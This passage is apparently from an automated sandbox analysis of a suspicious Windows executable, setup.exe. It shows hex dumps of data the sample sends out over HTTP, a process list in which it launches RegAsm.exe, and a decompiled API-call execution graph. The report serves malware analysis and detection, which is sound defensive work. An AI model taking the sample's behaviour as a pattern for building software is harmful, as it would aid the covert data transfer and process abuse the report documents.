            2024-06-23 16:49:04 UTC15331OUTData Raw: 73 5f e6 3c 1a 1c d5 62 3d 51 b1 ff 40 b6 a9 ff aa d4 f7 a7 ec 17 c7 2e f4 4a 45 3f 6d ec 3e 0e 56 f8 26 ca da 9b 08 12 8f 80 69 2d 8c b4 0a 48 99 1a 58 25 51 f5 77 0e da 2c 12 c6 a4 6f dc e8 a0 69 61 12 dd 40 2f 81 88 01 97 8f ab 7d 3f 84 c9 d7 3a ad 41 b4 00 3a 67 f1 bd 07 80 72 24 fc ba 81 61 29 9f 59 c9 3d a3 cc 30 fb 40 42 44 8b b6 1b 94 a0 05 f2 dd 39 2a 10 1c 4f a0 5c 62 9e 82 a8 0a 17 d6 b3 91 19 b3 fc 89 60 a2 0c ba fc b1 a1 ea f3 6e f2 54 88 ed ec cd 23 48 e5 e1 94 10 a3 7c d9 60 0b f9 e7 5b 13 53 91 d7 03 c5 56 06 25 fc f5 67 a8 e5 4e 04 48 65 fe 1e 44 01 86 8c ba 3b 5b e4 54 7d d4 9b 82 bd a4 ee bd 16 6a 39 1a db d3 71 e4 78 56 ee 96 c0 5b 2f e3 d6 ad 7b dc 87 28 c0 58 94 6e 15 87 e9 0f 82 fd a0 a6 81 30 c2 22 60 ab ad 09 8c 29 f3 0e df d7 00
            Data Ascii: s_<b=Q@.JE?m>V&i-HX%Qw,oia@/}?:A:gr$a)Y=0@BD9*O\b`nT#H|`[SV%gNHeD;[T}j9qxV[/{(Xn0"`)
            2024-06-23 16:49:04 UTC15331OUTData Raw: e1 2f 70 bd c4 46 2a b2 d4 d9 d6 0d ba ce 43 1b 0d f8 ef a6 13 36 24 ea 16 01 d2 95 b3 92 cf f0 67 4f ac b9 d6 47 8b 9b 6a a4 f5 34 0b 11 9b 02 4c 3d ab b2 76 0b 44 7b 4f 36 75 9a 39 f2 6c 9a 50 da f5 d6 95 41 ab 70 c8 fb b1 71 4c 09 29 29 53 5d 00 08 b1 2e 88 91 dc b6 87 0d 0b de ac d8 38 84 47 ed 8c c3 5d 20 f7 1d 10 87 f0 11 3d 0d e4 e0 a9 b5 1e 89 08 cf f8 f7 af f4 8b 9a 42 0f 08 67 8d f3 a7 fa e8 17 c4 7c db 08 c7 7d 3b 7c 3f 74 e6 83 9a 28 ef 21 f1 ff 77 da 35 d8 04 d4 50 0c 88 d1 43 a5 42 e1 19 c7 41 66 44 fd 47 00 d7 5f 80 d5 59 52 75 bf 27 ce 1f 88 65 18 19 b9 14 4e 05 c1 71 9b 8e a9 d1 e1 23 19 9b 2f ac 1f f1 74 98 d1 bf af 88 a1 e0 ee e1 6c 90 e4 45 d6 43 ad 54 9b c1 a6 6a 44 f7 d4 35 dc fe cc 00 6c fa 3b a3 3e b1 72 31 54 48 10 96 04 df 2c f5
            Data Ascii: /pF*C6$gOGj4L=vD{O6u9lPApqL))S].8G] =Bg|};|?t(!w5PCBAfDG_YRu'eNq#/tlECTjD5l;>r1TH,
            2024-06-23 16:49:04 UTC15331OUTData Raw: ee 5c 14 26 93 b0 b4 db 42 b2 da 2f fa 34 7e 63 ea 7d e5 34 0d 84 85 aa 90 c0 82 7d 66 77 bf 76 cb e0 ef ce 8c 0d 73 ed b2 fd 9d 26 b5 fa fd f9 61 3b ee d0 0e d6 3f 2f 65 8a 04 2a 90 68 be 87 03 9c d8 ea df 58 a6 2f b5 99 ab 39 ca 67 37 45 8a 50 8d c4 43 54 e1 57 c4 5e be dc 3c c3 5a 52 ad fe 45 fc 8b d9 ea 8a 20 4d e3 17 f1 d8 34 85 3b 70 86 0c cc c7 99 4f fe 06 1c 12 a7 47 8c aa 7e 60 63 c6 7a 27 f6 cb 63 ea 2b 1b 7c 0b 19 42 a7 ab 0e 3a 6c 32 f6 05 b6 04 50 8e 45 be 4f 15 8f aa af 46 cb 46 91 0a be 38 da ed a9 95 7e 6f 76 2f f8 c9 20 aa e9 f9 7a cd 4a 5b ae b0 e7 7c 9e 21 6c b8 e7 f7 6c 61 6d ea 13 6a f7 07 c2 d4 b7 42 11 67 40 9e de a6 8d e8 db 7e d0 0f 5d 5b fd 21 aa 30 54 bc a7 be 72 93 b3 79 a8 10 6b 2a 44 16 16 f4 bd 67 3a 1f 06 93 cd c2 ce cb 8e
            Data Ascii: \&B/4~c}4}fwvs&a;?/e*hX/9g7EPCTW^<ZRE M4;pOG~`cz'c+|B:l2PEOFF8~ov/ zJ[|!llamjBg@~][!0Tryk*Dg:
            2024-06-23 16:49:04 UTC15331OUTData Raw: c8 e0 df 86 28 e1 4f eb f4 ef 9f 27 fa 19 d8 6b a7 a4 af a8 dc bc 4a e4 3b 16 f0 3a 4a e5 3f 81 9a de d3 07 1d ca 83 cb ad b7 9e 28 58 cc ea 46 f9 c5 3d 0f d4 39 62 7d e4 92 7b d7 8f 92 b3 7f 50 35 cf 03 76 6c 9c 89 9f 14 93 f6 60 53 9e e3 c2 cf e7 07 bf 1d 60 95 d9 e8 76 f4 75 3e bc 3e 18 52 37 5e 9c da b1 9f 9c eb cc bd 6e 79 dd a1 eb 6c be 66 41 5a 1b b3 f7 67 fe b9 8e ce 58 d9 c1 bd 17 96 fa 16 56 de aa 3b e6 50 ff ec 0f 3b af 65 0e 22 1e 9f 83 f8 24 a1 da 0a df ef 5e 3b 3e 78 32 ce a7 3b ef e1 4b ce 6a e8 4a 9d 3a b1 92 6f b4 ff 6f fa 60 22 6d e0 e1 a4 f3 ed 9a 9c bf c2 16 ba a2 ba 1a a4 2e 85 2d ac 97 dc 40 a1 42 5a c7 d2 72 72 1b c6 52 57 de d2 56 6d 2c 5c 17 0c 7f c6 a6 65 34 5c 69 09 3a 42 12 ab ab f9 4a fd 13 e5 f6 76 61 22 ab 7d 33 eb c7 56 d6
            Data Ascii: (O'kJ;:J?(XF=9b}{P5vl`S`vu>>R7^nylfAZgXV;P;e"$^;>x2;KjJ:oo`"m.-@BZrrRWVm,\e4\i:BJva"}3V
            2024-06-23 16:49:04 UTC15331OUTData Raw: 53 a9 ed 4d cc cc 2d bf 7a 24 ba b8 55 bf 5d e8 bc 8b ad fb 28 78 39 9f 4a 25 4d 06 e0 9f c8 c3 ed 73 9e a2 cd 81 67 86 57 63 18 c7 f0 2d 0b a2 06 fc eb df 7b 90 bb c1 cc 82 72 0b 5d 10 93 92 54 6f b0 a8 1d 0f 6b 62 3c a7 a4 73 d8 ef 98 ca 28 73 2c 73 3b b6 b3 5b db 0d 86 23 c2 9f e8 b6 1b f1 25 b8 9f 76 7a d3 f9 6a 60 07 c2 b5 1f a1 ed d9 ae cd d9 6d 22 8f 48 d3 5f cf 8a ca 6d c4 e1 51 82 2b 78 e0 67 8e 67 fb 1c 70 1e 2a 9f e7 90 47 de 97 b2 09 90 03 89 7d 37 9a ba 5c 1a b0 8b e6 70 2f a1 f2 97 c4 7b b1 99 17 ed 96 f5 67 08 32 17 03 90 c9 75 0b e3 90 28 99 77 96 c5 9d 82 6e 6c 3c 1b 49 26 52 e4 36 1c 4b f2 e6 3d 84 f8 27 92 ea f6 e3 f3 e7 3d db 44 e5 95 40 c2 ea 6c 7f b3 6e 5a 53 cf 25 a0 a7 64 a6 93 7e 41 ff f5 3e 7d cd d6 57 8b 34 e5 4a f4 c7 23 2f 4a
            Data Ascii: SM-z$U](x9J%MsgWc-{r]Tokb<s(s,s;[#%vzj`m"H_mQ+xggp*G}7\p/{g2u(wnl<I&R6K='=D@lnZS%d~A>}W4J#/J
            2024-06-23 16:49:04 UTC15331OUTData Raw: 1f 67 c0 18 94 4f 64 ef e0 8e 04 93 08 e2 ab 8e c9 a1 7b 12 c6 18 c5 00 b1 68 93 02 27 0d 12 02 ad 60 65 98 75 8f 37 26 63 b6 7e db e2 bb be c1 c6 d5 76 9b f1 54 f1 1c 4e eb 43 c5 7f fb c2 67 b5 cb 78 e2 3c b5 b9 18 b9 94 69 16 26 36 63 c0 26 87 ee 99 33 93 db 8f 26 91 36 d2 96 90 df d0 22 bf 0c 2b 43 b2 cf 64 c2 70 1a 56 66 14 1a dd 6b 86 58 ab 49 6d 21 73 89 e5 c7 ff 44 87 11 b0 42 71 4a a1 50 42 85 40 b3 de 90 49 c5 07 19 6d 2b 7b 5c b7 4d 97 e2 b0 62 36 b4 a2 09 76 98 74 14 60 63 f6 5d d4 2c e5 05 04 91 33 a3 82 ee 92 47 58 2f 18 56 9c 6c a3 4d 89 ad d5 9b 33 14 93 2d 60 6e 60 ec 5f 87 53 01 8f be 88 32 44 11 2a 6a 41 ba 05 6d 23 a0 b8 fb be 1d 6e 69 3e 88 a2 22 f4 01 db b1 a7 04 7b 2d 63 36 be 87 49 ca 56 96 ba 4e 53 58 e4 bf 7c 90 52 d8 81 b6 d7 c6
            Data Ascii: gOd{h'`eu7&c~vTNCgx<i&6c&3&6"+CdpVfkXIm!sDBqJPB@Im+{\Mb6vt`c],3GX/VlM3-`n`_S2D*jAm#ni>"{-c6IVNSX|R
            2024-06-23 16:49:04 UTC15331OUTData Raw: fb 33 9b 28 12 6d 33 a5 e5 35 72 45 6b 2c bc 70 e4 0a 27 4c 31 99 48 f5 06 d0 a0 31 95 ad 46 44 e0 f5 77 e2 ce 16 21 37 3f fa 37 53 f7 f0 01 e5 bf b3 be 39 bc dc fc 21 1a 39 35 1a 87 fd 78 80 ed f1 08 65 e4 57 7c 7e 77 d4 1e 35 5d b8 dc be a4 ff 98 2b 49 2d 30 25 04 39 47 92 72 d0 0d df 72 90 a1 e8 03 44 b8 8d 64 e1 92 78 da 07 10 d1 37 47 28 83 e9 60 b0 ad 0a 88 1b 1c a0 d0 a0 24 a5 95 b5 1f fc d5 a7 be d6 de 42 6f 2a 50 a9 97 80 da 89 88 55 ff 11 ec ee 3a 16 6b ed 07 ae 00 34 0a ef 0a e0 48 77 a4 f6 38 e8 3c 8c 3d 11 dc 25 2e f6 a6 6a 5b 89 1d 1b 74 11 85 7f 11 a3 03 04 91 08 1b b5 2c a0 76 84 d7 59 35 fa 6e 0c eb b1 e4 a6 4d 64 58 c9 3e 91 6c be 9a 8f 80 77 e4 a8 fe 9b b3 9c 87 f1 f0 ad bd 46 3a 5c 6f 1a bc 0e 48 bf 36 32 4c 46 b0 eb 73 7a e6 7c 1f 3a
            Data Ascii: 3(m35rEk,p'L1H1FDw!7?7S9!95xeW|~w5]+I-0%9GrrDdx7G(`$Bo*PU:k4Hw8<=%.j[t,vY5nMdX>lwF:\oH62LFsz|:
            2024-06-23 16:49:06 UTC816INHTTP/1.1 200 OK
            Date: Sun, 23 Jun 2024 16:49:06 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Set-Cookie: PHPSESSID=hkt0ueb1nvqghqjds5db6jrv40; expires=Thu, 17-Oct-2024 10:35:44 GMT; Max-Age=9999999; path=/
            Expires: Thu, 19 Nov 1981 08:52:00 GMT
            Cache-Control: no-store, no-cache, must-revalidate
            Pragma: no-cache
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x6hVmNBKj660TBUh%2BgwcSRiYTyGAf%2FIoKwUoq%2BcE%2BULzJkplOptrzJTHttlkGZ%2FATh7nVlj2fO%2Bk7lNRtiKE5nHOAOGuRVDZRSbrvXKpUvAM1m8AGRz%2FM6dX6TNp03f01JP1HOc76g%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8985f8220ee05e6d-EWR
            alt-svc: h3=":443"; ma=86400


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:12:48:54
            Start date:23/06/2024
            Path:C:\Users\user\Desktop\setup.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\setup.exe"
            Imagebase:0xae0000
            File size:536'576 bytes
            MD5 hash:864FB28B0001B98DDD896DBDC604DB30
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:1
            Start time:12:48:54
            Start date:23/06/2024
            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Imagebase:0xeb0000
            File size:65'440 bytes
            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:12:48:54
            Start date:23/06/2024
            Path:C:\Windows\SysWOW64\WerFault.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 696
            Imagebase:0x290000
            File size:483'680 bytes
            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:3%
              Dynamic/Decrypted Code Coverage:1.1%
              Signature Coverage:4.8%
              Total number of Nodes:559
              Total number of Limit Nodes:5
              execution_graph 20912 b054a0 46 API calls 3 library calls 21012 afd2b1 15 API calls 21014 aea684 LeaveCriticalSection __fread_nolock 20916 ae949c 16 API calls 2 library calls 21016 aec69b 5 API calls 2 library calls 21017 b05288 43 API calls 3 library calls 20919 aeb4ef GetModuleHandleW GetProcAddress GetProcAddress GetProcAddress 21021 b056f3 44 API calls 3 library calls 20681 b020f8 20686 b01ece 20681->20686 20684 b02137 20687 b01eed 20686->20687 20688 b01f00 20687->20688 20696 b01f15 20687->20696 20706 af029d 14 API calls __Wcrtomb 20688->20706 20690 b01f05 20707 af007f 41 API calls __wsopen_s 20690->20707 20692 b01f10 20692->20684 20703 b094d2 20692->20703 20694 b020e6 20712 af007f 41 API calls __wsopen_s 20694->20712 20696->20696 20701 b02035 20696->20701 20708 b08d64 41 API calls 2 library calls 20696->20708 20698 b02085 20698->20701 20709 b08d64 41 API calls 2 library calls 20698->20709 20700 b020a3 20700->20701 20710 b08d64 41 API calls 2 library calls 20700->20710 20701->20692 20711 af029d 14 API calls __Wcrtomb 20701->20711 20713 b08e9c 20703->20713 20706->20690 20707->20692 20708->20698 20709->20700 20710->20701 20711->20694 20712->20692 20714 b08ea8 ___scrt_is_nonwritable_in_current_image 20713->20714 20715 b08eaf 20714->20715 20718 b08eda 20714->20718 20733 af029d 14 API calls __Wcrtomb 20715->20733 20717 b08eb4 20734 af007f 41 API calls __wsopen_s 20717->20734 20724 b09464 20718->20724 20723 b08ebe 20723->20684 20736 b025e8 20724->20736 20729 b0949a 20731 b08efe 20729->20731 20732 afc69c ___free_lconv_mon 14 API calls 20729->20732 20735 b08f31 LeaveCriticalSection __wsopen_s 20731->20735 20732->20731 20733->20717 20734->20723 20735->20723 20791 af166e 20736->20791 20740 b0260c 20741 af8b26 20740->20741 20803 af8a74 20741->20803 20744 b094f2 20828 b09240 20744->20828 20747 b09524 20860 af028a 14 API calls __Wcrtomb 20747->20860 20748 b0953d 20846 b03706 20748->20846 20751 b09529 20861 af029d 14 API calls __Wcrtomb 20751->20861 20753 b09562 20859 b091ab CreateFileW 20753->20859 20754 b0954b 20862 af028a 14 API calls __Wcrtomb 20754->20862 20758 b09550 20863 af029d 14 API calls __Wcrtomb 20758->20863 20759 b09536 20759->20729 20761 b09618 GetFileType 20762 b09623 GetLastError 20761->20762 20763 b0966a 20761->20763 20866 af0243 14 API calls 2 library calls 20762->20866 20868 b03651 15 API calls 3 library calls 20763->20868 20764 b095ed GetLastError 20865 af0243 14 API calls 2 library calls 20764->20865 20766 b0959b 20766->20761 20766->20764 20864 b091ab CreateFileW 20766->20864 20768 b09631 CloseHandle 20768->20751 20770 b0965a 20768->20770 20867 af029d 14 API calls __Wcrtomb 20770->20867 20772 b095e0 20772->20761 20772->20764 20774 b0968b 20776 b096d7 20774->20776 20869 b093ba 75 API calls 4 library calls 20774->20869 20775 b0965f 20775->20751 20780 b096de 20776->20780 20871 b08f5d 75 API calls 4 library calls 20776->20871 20779 b0970c 20779->20780 20781 b0971a 20779->20781 20870 afd438 44 API calls 2 library calls 20780->20870 20781->20759 20783 b09796 CloseHandle 20781->20783 20872 b091ab CreateFileW 20783->20872 20785 b097c1 20786 b097cb GetLastError 20785->20786 20787 b097f7 20785->20787 20873 af0243 14 API calls 2 library calls 20786->20873 20787->20759 20789 b097d7 20874 b03819 15 API calls 3 library calls 20789->20874 20792 af168c 20791->20792 20798 af1685 20791->20798 20792->20798 20800 afb970 41 API calls 3 library calls 20792->20800 20794 af16ad 20801 afc80a 41 API calls __Getctype 20794->20801 20796 af16c3 20802 afc868 41 API calls __wsopen_s 20796->20802 20798->20740 20799 afcc37 5 API calls std::_Lockit::_Lockit 20798->20799 20799->20740 20800->20794 20801->20796 20802->20798 20804 af8a9c 20803->20804 20805 af8a82 20803->20805 20807 af8aa3 20804->20807 20808 af8ac2 20804->20808 20821 af8b43 14 API calls ___free_lconv_mon 20805->20821 20809 af8a8c 20807->20809 20822 af8b5d 15 API calls __wsopen_s 20807->20822 20823 b02303 MultiByteToWideChar 20808->20823 20809->20729 20809->20744 20811 af8ad1 20813 af8ad8 GetLastError 20811->20813 20815 af8afe 20811->20815 20826 af8b5d 15 API calls __wsopen_s 20811->20826 20824 af0243 14 API calls 2 library calls 20813->20824 20815->20809 20827 b02303 MultiByteToWideChar 20815->20827 20816 af8ae4 20825 af029d 14 API calls __Wcrtomb 20816->20825 20820 af8b15 20820->20809 20820->20813 20821->20809 20822->20809 20823->20811 20824->20816 20825->20809 20826->20815 20827->20820 20829 b09261 20828->20829 20830 b0927b 20828->20830 20829->20830 20882 af029d 14 API calls __Wcrtomb 20829->20882 20875 b091d0 20830->20875 20833 b09270 20883 af007f 41 API calls __wsopen_s 20833->20883 20835 b092b3 20836 b092e2 20835->20836 20884 af029d 14 API calls __Wcrtomb 20835->20884 20839 b09335 20836->20839 20886 af97a3 41 API calls 2 library calls 20836->20886 20839->20747 20839->20748 20840 b09330 20840->20839 20842 b093ad 20840->20842 20841 b092d7 20885 af007f 41 API calls __wsopen_s 20841->20885 20887 af00ac 11 API calls CallUnexpected 20842->20887 20845 b093b9 20847 b03712 ___scrt_is_nonwritable_in_current_image 20846->20847 20890 af7639 EnterCriticalSection 20847->20890 20849 b03719 20851 b0373e 20849->20851 20855 b037ad EnterCriticalSection 20849->20855 20857 b03760 20849->20857 20894 b034e0 15 API calls 3 library calls 20851->20894 20854 b03743 20854->20857 20895 b0362e EnterCriticalSection 20854->20895 20856 b037ba LeaveCriticalSection 20855->20856 20855->20857 20856->20849 20891 b03810 20857->20891 20859->20766 20860->20751 20861->20759 20862->20758 20863->20751 20864->20772 20865->20751 20866->20768 20867->20775 20868->20774 20869->20776 20870->20759 20871->20779 20872->20785 20873->20789 20874->20787 20876 b091e8 20875->20876 20877 b09203 20876->20877 20888 af029d 14 API calls __Wcrtomb 20876->20888 20877->20835 20879 b09227 20889 af007f 41 API calls __wsopen_s 20879->20889 20881 b09232 20881->20835 20882->20833 20883->20830 20884->20841 20885->20836 20886->20840 20887->20845 20888->20879 20889->20881 20890->20849 20896 af7681 LeaveCriticalSection 20891->20896 20893 b03780 20893->20753 20893->20754 20894->20854 20895->20857 20896->20893 20921 ae34e0 42 API calls std::bad_exception::bad_exception 20922 af40f5 75 API calls 2 library calls 21023 ae62f0 72 API calls 2 library calls 21025 ae96d9 9 API calls 3 library calls 21026 aeaad3 45 API calls _Ungetc 20928 ae102e 79 API calls 21028 b09e30 51 API calls 20929 afb42d 7 API calls ___scrt_uninitialize_crt 21030 af8e3b 42 API calls 3 library calls 21031 b03a28 45 API calls 2 library calls 20936 aee830 6 API calls 3 library calls 21033 aea60f EnterCriticalSection __fread_nolock 21034 aec206 51 API calls _unexpected 20941 ae1005 45 API calls 21037 ae3a00 14 API calls ___std_exception_destroy 20943 af401d 15 API calls 3 library calls 20944 ae101b 44 API calls 20945 afec1a 68 API calls 2 library calls 21040 aeb218 DecodePointer 20946 afbc15 16 API calls __Wcrtomb 20198 aeb66d 20199 aeb679 ___scrt_is_nonwritable_in_current_image 20198->20199 20224 aeb869 11 API calls ___scrt_uninitialize_crt 20199->20224 20201 aeb680 20202 aeb7d3 20201->20202 20212 aeb6aa ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 20201->20212 20255 aec06d 4 API calls 2 library calls 20202->20255 20204 aeb7da 20256 af978d 23 API calls CallUnexpected 20204->20256 20206 aeb7e0 20257 af9751 23 API calls CallUnexpected 20206->20257 20208 aeb7e8 20209 aeb6c9 20210 aeb74a 20225 aec182 GetStartupInfoW __fread_nolock 20210->20225 20212->20209 20212->20210 20251 af71d6 41 API calls 3 library calls 20212->20251 20213 aeb750 20226 ae8ec0 20213->20226 20218 aeb76c 20218->20204 20219 aeb770 20218->20219 20220 aeb779 20219->20220 20253 af9742 23 API calls CallUnexpected 20219->20253 20254 aeb9da 77 API calls ___scrt_uninitialize_crt 20220->20254 20223 aeb781 20223->20209 20224->20201 20225->20213 20258 ae69e0 20226->20258 20228 ae8ed5 CreateThread WaitForSingleObject CloseHandle 20292 ae15e0 20228->20292 20544 ae83c0 20228->20544 20230 ae8f24 20231 ae15e0 43 API calls 20230->20231 20232 ae8f4c 20231->20232 20233 ae15e0 43 API calls 20232->20233 20234 ae8f74 20233->20234 20300 ae1680 43 API calls 2 library calls 20234->20300 20236 ae90e6 20326 af008f 41 API calls 2 library calls 20236->20326 20237 ae8fc3 std::ios_base::_Ios_base_dtor 20237->20236 20248 ae9024 20237->20248 20238 ae90bd GetNumberOfEventLogRecords 20318 ae4e30 41 API calls 20238->20318 20241 ae90d0 20319 aeb577 20241->20319 20245 ae90e0 20252 aec1b8 GetModuleHandleW 20245->20252 20248->20238 20250 ae90bc 20248->20250 20301 ae1e80 51 API calls Concurrency::cancel_current_task 20248->20301 20302 ae2610 75 API calls 6 library calls 20248->20302 20303 ae7e20 51 API calls Concurrency::cancel_current_task 20248->20303 20304 ae6890 20248->20304 20250->20238 20251->20210 20252->20218 20253->20220 20254->20223 20255->20204 20256->20206 20257->20208 20327 ae2a90 20258->20327 20260 ae73dc 20379 ae52b0 72 API calls 20260->20379 20262 ae73e5 20264 ae7464 20262->20264 20267 ae7414 20262->20267 20380 ae3880 72 API calls std::ios_base::_Ios_base_dtor 20264->20380 20266 ae748a std::ios_base::_Ios_base_dtor 20268 aeb577 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20266->20268 20386 ae3670 43 API calls 2 library calls 20267->20386 20271 ae74d2 20268->20271 20271->20228 20272 ae7530 20387 aec3f0 RaiseException 20272->20387 20274 ae7542 20388 ae22c0 75 API calls 6 library calls 20274->20388 20276 ae755c 20276->20228 20277 af029d 14 API calls __Wcrtomb 20290 ae6a10 std::ios_base::_Ios_base_dtor _Yarn 20277->20290 20279 ae74f9 20385 ae92da 43 API calls 2 library calls 20279->20385 20281 ae74ef 20384 ae931a 43 API calls 2 library calls 20281->20384 20283 ae74d6 20381 af008f 41 API calls 2 library calls 20283->20381 20285 ae74db 20382 ae931a 43 API calls 2 library calls 20285->20382 20287 ae74e5 20383 ae92da 43 API calls 2 library calls 20287->20383 20289 ae1550 43 API calls 20289->20290 20290->20260 20290->20277 20290->20279 20290->20281 20290->20283 20290->20285 20290->20287 20290->20289 20347 ae2450 20290->20347 20376 ae2100 83 API calls Concurrency::cancel_current_task 20290->20376 20377 af3fd7 44 API calls _Fputc 20290->20377 20378 af3fc0 44 API calls 20290->20378 20293 ae1675 20292->20293 20297 ae15f4 20292->20297 20529 ae4ec0 43 API calls 20293->20529 20295 ae15f9 _Yarn 20295->20230 20297->20295 20528 ae14f0 43 API calls 2 library calls 20297->20528 20299 ae164b _Yarn 20299->20230 20300->20237 20301->20248 20302->20248 20303->20248 20305 ae68d1 20304->20305 20310 ae6963 20304->20310 20530 ae37c0 20305->20530 20307 ae6952 20535 ae935a 20307->20535 20309 ae6957 20309->20310 20539 ae4c30 43 API calls 20309->20539 20310->20248 20311 ae68da 20311->20307 20313 ae698c 20311->20313 20540 ae3670 43 API calls 2 library calls 20313->20540 20315 ae69be 20541 aec3f0 RaiseException 20315->20541 20317 ae69cc 20318->20241 20320 aeb57f 20319->20320 20321 aeb580 IsProcessorFeaturePresent 20319->20321 20320->20245 20323 aebda3 20321->20323 20543 aebd66 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20323->20543 20325 aebe86 20325->20245 20328 ae2aa0 20327->20328 20389 ae2d20 20328->20389 20334 ae2b49 20415 ae9e9e 20334->20415 20337 ae2bed 20424 ae4400 41 API calls 20337->20424 20339 ae2bf7 20425 ae22c0 75 API calls 6 library calls 20339->20425 20340 ae2c40 20346 ae2c12 20340->20346 20426 ae3670 43 API calls 2 library calls 20340->20426 20343 ae2c9d 20427 aec3f0 RaiseException 20343->20427 20345 ae2cac 20346->20290 20517 ae9119 7 API calls std::_Lockit::_Lockit 20347->20517 20349 ae246a 20355 ae24a5 20349->20355 20518 ae9119 7 API calls std::_Lockit::_Lockit 20349->20518 20351 ae2484 20519 ae9171 LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 20351->20519 20354 ae25ed 20354->20290 20356 ae2507 20355->20356 20357 ae24f2 20355->20357 20367 ae25d4 20355->20367 20359 aeb534 std::_Facet_Register 16 API calls 20356->20359 20520 ae9171 LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 20357->20520 20363 ae250e 20359->20363 20360 ae24fd 20360->20290 20361 ae25aa 20362 ae25ce 20361->20362 20524 ae3960 68 API calls 2 library calls 20361->20524 20525 ae94be 16 API calls std::_Facet_Register 20362->20525 20363->20361 20521 ae9119 7 API calls std::_Lockit::_Lockit 20363->20521 20526 ae9171 LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 20367->20526 20368 ae2542 20369 ae2588 20368->20369 20370 ae25f7 20368->20370 20522 ae95ee 69 API calls 2 library calls 20369->20522 20527 ae933a 43 API calls 2 library calls 20370->20527 20373 ae2593 20523 ae9703 45 API calls __Getctype 20373->20523 20376->20290 20377->20290 20378->20290 20379->20262 20380->20266 20386->20272 20387->20274 20388->20276 20390 ae2d2f 20389->20390 20428 ae51c0 20390->20428 20393 aeb534 std::_Facet_Register 16 API calls 20394 ae2dc0 20393->20394 20395 ae2dd0 20394->20395 20435 ae94f0 47 API calls 6 library calls 20394->20435 20397 ae2450 75 API calls 20395->20397 20400 ae2e03 20397->20400 20398 ae2e4c 20399 ae2abd 20398->20399 20436 ae9ce1 9 API calls 2 library calls 20398->20436 20407 aeb534 20399->20407 20400->20398 20402 ae2e67 20400->20402 20437 ae3670 43 API calls 2 library calls 20402->20437 20404 ae2e9d 20438 aec3f0 RaiseException 20404->20438 20406 ae2eac 20409 aeb539 20407->20409 20410 ae2b39 20409->20410 20412 aeb555 std::_Facet_Register 20409->20412 20441 af76f3 20409->20441 20450 af8bca EnterCriticalSection LeaveCriticalSection std::_Facet_Register 20409->20450 20410->20334 20423 ae94f0 47 API calls 6 library calls 20410->20423 20451 aec3f0 RaiseException 20412->20451 20414 aebd60 20416 ae9e21 20415->20416 20417 ae2be6 20416->20417 20454 af80a8 20416->20454 20417->20337 20417->20340 20421 ae9e88 20421->20417 20472 af42d4 71 API calls _Fputc 20421->20472 20423->20334 20424->20339 20425->20346 20426->20343 20427->20345 20429 ae2db9 20428->20429 20430 ae51da 20428->20430 20429->20393 20439 ae3670 43 API calls 2 library calls 20430->20439 20432 ae5211 20440 aec3f0 RaiseException 20432->20440 20434 ae5220 20435->20395 20436->20399 20437->20404 20438->20406 20439->20432 20440->20434 20442 affdaa 20441->20442 20443 affde8 20442->20443 20444 affdd3 HeapAlloc 20442->20444 20448 affdbc _unexpected 20442->20448 20453 af029d 14 API calls __Wcrtomb 20443->20453 20446 affde6 20444->20446 20444->20448 20447 affded 20446->20447 20447->20409 20448->20443 20448->20444 20452 af8bca EnterCriticalSection LeaveCriticalSection std::_Facet_Register 20448->20452 20450->20409 20451->20414 20452->20448 20453->20447 20455 af7ff1 ___scrt_is_nonwritable_in_current_image 20454->20455 20456 af8004 20455->20456 20459 af8024 20455->20459 20481 af029d 14 API calls __Wcrtomb 20456->20481 20458 af8009 20482 af007f 41 API calls __wsopen_s 20458->20482 20460 af8029 20459->20460 20461 af8036 20459->20461 20483 af029d 14 API calls __Wcrtomb 20460->20483 20473 afd508 20461->20473 20465 ae9e6d 20465->20417 20471 af4f99 68 API calls _Fputc 20465->20471 20467 af8046 20484 af029d 14 API calls __Wcrtomb 20467->20484 20468 af8053 20485 af8091 LeaveCriticalSection __fread_nolock 20468->20485 20471->20421 20472->20417 20474 afd514 ___scrt_is_nonwritable_in_current_image 20473->20474 20486 af7639 EnterCriticalSection 20474->20486 20476 afd522 20487 afd5ac 20476->20487 20481->20458 20482->20465 20483->20465 20484->20465 20485->20465 20486->20476 20495 afd5cf 20487->20495 20488 afd627 20506 afc63f 14 API calls 3 library calls 20488->20506 20490 afd630 20507 afc69c 20490->20507 20495->20488 20496 afd52f 20495->20496 20504 af4187 EnterCriticalSection 20495->20504 20505 af419b LeaveCriticalSection 20495->20505 20501 afd568 20496->20501 20497 afd658 20514 af4187 EnterCriticalSection 20497->20514 20500 afd66b 20500->20496 20516 af7681 LeaveCriticalSection 20501->20516 20503 af803f 20503->20467 20503->20468 20504->20495 20505->20495 20506->20490 20508 afc6a7 RtlFreeHeap 20507->20508 20509 afc6d1 20507->20509 20508->20509 20510 afc6bc GetLastError 20508->20510 20509->20496 20513 